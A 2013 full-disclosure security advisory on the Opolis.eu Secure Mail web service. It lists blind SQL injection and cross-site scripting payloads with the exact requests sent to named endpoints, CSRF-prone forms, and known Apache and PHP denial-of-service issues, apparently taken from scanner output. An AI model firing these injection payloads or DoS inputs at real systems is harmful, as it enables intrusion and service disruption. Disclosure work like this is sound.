Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS

Related Vulnerabilities: CVE-2011-3192  
Publish Date: 07 Oct 2013
                =========================================================================================================================================================================
OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text
==========================================================================================================================================================================

TIME-LINE VULNERABILITY

Multiples Advisories 

Opolis Secure IT-Services GmbH

Address:Romberggasse 3
1230 Vienna
Austria
E-Mail Contact:    helpdesk@opolis.eu<helpdesk@opolis.eu>

BUT 

   Not Response

THEN

   Full Disclosure


I. VULNERABILITY
-------------------------
#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text

#Vendor:http://www.opolis.eu/

#Author:Juan Carlos García (@secnight)

#Follow me 
Twitter:@secnight

II. DESCRIPTION
-------------------------
Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service.
Opolis re-defines E-Mail with its “Power to the Sender” philosophy: The sender decides if or how E-Mails may be further 
processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions
for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL.

III. PROOF OF CONCEPT
-------------------------

Blind SQL Injection
********************

Vulnerability description
-------------------------

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and 

doesn't properly filter out dangerous characters. 

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.

Affected items
----------------

/createOpolisWorkGroup/createOpolisWorkGroupStep5.php 


URL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- 

POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php 

aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect

%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc



/slimstat/stats_js.php 

"ttl"

URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK

(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/



GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version

%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%

GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version

%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%


"url"

URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK

(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/



GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR

%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f 


GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR

%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f


Cross site scripting ( 67 )
*********************

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser. 

Affected items
----------------

/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2)

URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304


POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php

checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304



/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2)

URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560


POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php 

currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl



/OpolisSignUp/OpolisSignUpStep1a.php (2)

URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637

POST /OpolisSignUp/OpolisSignUpStep1a.php 

checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637




/OpolisSignUp/OpolisSignUpStep2a.php 

URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211

The input is reflected inside <script> tag between double quotes.



POST /OpolisSignUp/OpolisSignUpStep2a.php 


currentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh


/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3)

URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(939864) bad="


POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php

checkedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield=



/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5)


URL encoded POST input checkedemail was set to 1" onmouseover=prompt(911118) bad="

POST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php 

checkedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield



POST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5)

URL encoded POST input checkedemail was set to 1" onmouseover=prompt(967963) bad="

checkedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst



/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52)

URL encoded POST input aicountry was set to Antarctica'"()&%<ScRiPt >prompt(973546)</ScRiPt>

aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt

%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp




/OpolisSignUp/OpolisSignUpStep2a.php. (3)

URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad="

checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield=


/OpolisSignUp/OpolisSignUpStep3a.php. (5)

URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad="

checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield=


Cross Site Request Forgery CSRF (12)
*******************************

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.


Affected items
---------------
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php 
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) 
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php 
/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) 
/OpolisSignUp/OpolisSignUpStep1a.php 
/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) 
/OpolisSignUp/OpolisSignUpStep3a.php 
/slimstat (9200b13decfada22b75676834e865e65) 

The impact of this vulnerability
---------------------------------

An attacker may force the users of a web application to execute actions of the attacker's choosing. 
A successful CSRF exploit can compromise end user data and operation in case of normal user. 
If the targeted end user is the administrator account, this can compromise the entire web application.


Two examples ( too much security flaws .. )

/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2)

Attack details
----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php
Form method: POST

Form inputs:

checkloginname [Hidden]
OSMLogInNam [Text]


/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). 

Attack details
-----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php
Form method: POST

Form inputs:

showcheckedloginname [Text]
currentEmail [Text]

POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php

checkedloginname=&showEmailfield=



Apache httpd Remote D.O.S (2)
**************************

Vulnerability description
-------------------------------
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: 

http://seclists.org/fulldisclosure/2011/Aug/175 

An attack tool is circulating in the wild. Active use of this tools has been observed. 

The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. 


Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).


How to fix this vulnerability
----------------------------
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. 

Web references
--------------
CVE-2011-3192 
Apache HTTPD Security ADVISORY 
Apache HTTP Server 2.2.20 Released 
Apache httpd Remote Denial of Service (memory exhaustion) 


Apache httpOnly cookie disclosure
**********************************

Vulnerability description
----------------------------
Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors 

involving a (1) long or (2) malformed header in conjunction with crafted web script.

Affected Apache versions (up to 2.0.21).

The impact of this vulnerability
-------------------------------
Information disclosure.

How to fix this vulnerability
------------------------------
Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue.

Web references
---------------
Fixed in Apache httpd 2.2.22 
Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability 



PHP hangs on parsing particular strings as floating point number (2)
*****************************************************************

PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number.

Current version is : PHP/5.3.1

Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17

Affected items
---------------
Web Server 

The impact of this vulnerability
----------------------------------
Denial of service attack

How to fix this vulnerability
-------------------------------
Upgrade PHP to the latest version.

Web references
-----------------
PHP Hangs On Numeric Value 2.2250738585072011e-308 
PHP Homepage 


User credentials are sent in clear text
*****************************************

Vulnerability description
---------------------------
User credentials are transmitted over an unencrypted channel. 
This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Affected items
--------------
/slimstat (9200b13decfada22b75676834e865e65) 

The impact of this vulnerability
----------------------------------
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

How to fix this vulnerability
-------------------------------
Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS).


IV. BUSINESS IMPACT
-------------------------

( No Comments... )

V SOLUTION
------------------------

Very easy and I don´t understand... WRITE SECURE CODE P L E A S E !!


VI. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)


VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.


<p>